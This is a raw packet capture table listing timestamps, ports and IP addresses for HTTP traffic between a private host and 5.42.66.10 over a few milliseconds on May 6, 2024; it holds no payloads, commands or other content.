May 6, 2024 07:53:04.525561094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525566101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525578022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525583982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525588989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525602102 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525602102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525614977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525624037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525628090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525639057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525641918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525650978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525661945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525665998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525674105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525685072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525695086 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525696039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525707960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525712013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525718927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525732040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525736094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525743961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525755882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525764942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525768995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525779009 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525779963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525796890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525801897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525814056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525824070 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525825977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525840044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525850058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525852919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525867939 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525886059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525888920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525897980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525908947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525921106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525926113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525933027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525943995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525950909 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525955915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525966883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525978088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525983095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525983095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525990963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526009083 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526014090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526026011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526051998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526052952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526070118 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526107073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526119947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526129961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526140928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526145935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526151896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526158094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526165009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526175976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526179075 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526187897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526199102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526201963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526213884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526216030 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526226044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526237965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526246071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526271105 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526288033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526299953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526309967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526323080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526325941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526335001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526346922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526351929 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526374102 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526388884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526422977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526433945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526443958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526456118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526463985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526467085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526477098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526489019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526489973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526501894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526514053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526515961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526529074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526540041 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526540995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526555061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526556969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526566982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526576996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526580095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526588917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526601076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526607990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526612043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526624918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526624918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526637077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526638031 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526665926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526689053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526715040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526726961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526740074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526751995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526755095 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526762962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526767969 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526784897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526787043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526798964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526809931 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526812077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526824951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526834965 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526838064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526863098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526880026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526901960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526913881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526925087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526937008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526942968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526948929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526961088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526971102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526971102 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526983023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.526987076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.526998997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527010918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527012110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527023077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527034998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527036905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527046919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527054071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527059078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527070045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527081013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527081013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527095079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527106047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527108908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527121067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527122021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527163982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527178049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527188063 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527190924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527203083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527215004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527220011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527234077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527255058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527264118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527276993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527287006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527298927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527303934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527309895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527318001 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527323008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527334929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527334929 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527347088 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527358055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527359009 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527369022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527371883 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527380943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527393103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527399063 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527404070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527427912 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527436018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527439117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527446985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527456999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527472973 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527477980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527486086 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527489901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527503014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527503967 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527513027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527520895 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527524948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527533054 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527561903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527568102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527580023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527590036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527601957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527606964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527632952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527653933 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527671099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527683973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527700901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527713060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527713060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527724981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527729988 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527736902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527746916 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527748108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527760029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527770042 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527771950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527782917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527791977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527795076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527823925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527837038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527867079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527879000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527889013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527900934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527904987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527911901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527915955 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527924061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527936935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527937889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527947903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.527966022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527987003 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.527991056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528001070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528012991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528024912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528028011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528037071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528049946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528053999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528062105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528079033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528095961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528127909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528141022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528151035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528162956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528167963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528175116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528184891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528192043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528197050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528208971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528219938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528223038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528232098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528237104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528244019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528254986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528264999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528266907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528278112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528290033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528290033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528301001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528314114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528316021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528326988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528327942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528340101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528359890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528359890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528372049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528373003 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528383017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528394938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528402090 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528418064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528424025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528429985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528441906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528448105 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528454065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528466940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528474092 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528482914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528493881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528501987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528518915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528536081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528536081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528548956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528559923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528570890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528575897 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528589964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528616905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528623104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528635025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528645039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528659105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528666019 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528691053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528709888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528717995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528729916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528740883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528753996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528758049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528765917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528776884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528778076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528789043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528795004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528800011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528812885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528820992 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528825045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528836966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528840065 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528847933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528852940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528871059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528881073 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528919935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528919935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528932095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528943062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528953075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528963089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528964996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528978109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.528989077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.528990984 CEST	80	49741	5.42.66.10	192.168.2.4
